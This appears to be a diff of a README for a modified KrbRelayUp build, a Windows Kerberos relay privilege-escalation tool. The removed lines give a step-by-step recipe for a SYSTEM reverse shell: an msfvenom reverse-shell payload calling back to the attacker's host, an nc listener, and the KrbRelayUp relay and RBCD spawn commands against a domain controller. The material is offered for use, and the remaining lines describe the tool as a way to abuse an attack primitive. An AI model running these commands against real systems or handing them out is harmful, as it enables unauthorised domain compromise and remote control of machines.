m-cetin/KrbRelayUp/README.md

-# Modified version of KrbRelayUp to execute custom executables
-**KrbRelayUp-Shell.exe**: This version of KrbRelayUp.exe runs C:\Temp\update.exe instead of opening a new commad prompt.
-Useful if you don't have RDP access to a machine and need to get a reverse shell as SYSTEM.

-# Example Usage with msfvenom payloads

-`msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR-IP> LPORT=443 EXITFUNC=thread -f exe > update.exe`

-Make sure to place your binary `update.exe` under `C:\Temp`, otherwise it won't be executed.
-Start a reverse shell:

-`sudo rlwrap nc -nvlp 443`

-And run KrbRelayUp exploit on the windows machine:

-`.\KrbRelayUp.exe relay -c -cn machAccount$ -cp pass@123`

-`.\KrbRelayUp.exe spawn -m rbcd -d <bla.local> -dc <DC.bla.local> -cn machAccount$ -cp pass@123`

-Enjoy your shell.

 # KrbRelayUp
 Simple wrapper around some of the features of [Rubeus](https://github.com/GhostPack/Rubeus/) and [KrbRelay](https://github.com/cube0x0/KrbRelay) (and a few other honorable mentions in the acknowledgements section) in order to streamline the abuse of the following attack primitive: